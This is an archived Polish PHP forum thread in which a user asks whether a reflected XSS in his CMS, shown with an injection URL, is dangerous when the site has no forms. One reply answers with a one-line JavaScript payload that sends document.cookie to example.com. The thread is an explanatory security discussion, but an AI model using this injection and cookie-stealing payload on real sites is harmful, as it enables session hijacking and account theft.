Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [JS][XSS]Bezpieczeństwo
Forum PHP.pl > Forum > Przedszkole
Damonsson
28.07.2011, 02:48:09
Mam pytanie odnośnie bezpieczeństwa. Załóżmy, że mam stronę opartą na systemie zarządzania treścią. Dodając w treści adresu przykładowo
Kod
http://mojastrona.pl/index.php?kategoria=1&artykul=1&"><script alert(12345) script>=12345


Dopiero po podwójnym url encode co prawda, ale jest podatna, bo wyświetla się alert.

Ale teraz najważniejsze, czy można z tym cokolwiek zrobić, to znaczy jakkolwiek wykorzystać w niecnych celach? Na całej stronie, nie ma możliwości pozostawienia jakiegoś wpisu, ani formularza kontaktowego, no żadnej możliwości dodania czegokolwiek na stronę. Więc, czy taka podatność jest w jakikolwiek sposób niebezpieczna?
erix
28.07.2011, 10:08:46 
[JAVASCRIPT] pobierz, plaintext 
  1. var img = new Image(); img.src = 'http://example.com/?zapiszCookie='+encodeURIComponent(document.cookie);
[JAVASCRIPT] pobierz, plaintext

Pytania?
CuteOne
28.07.2011, 11:52:50
Ciekawy temat i ja się dołączę do pytania - czy bez możliwości zapisu JS w formularzu lub czymkolwiek co na stałe zapisze nam dane na serwerze istnieje możliwość ataku XSS? Wiem, że pytanie dość "noobowskie" ale lepiej się upewnić na 99% niż obudzić się z ręką w nocniku smile.gif

Pozdrawiam
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.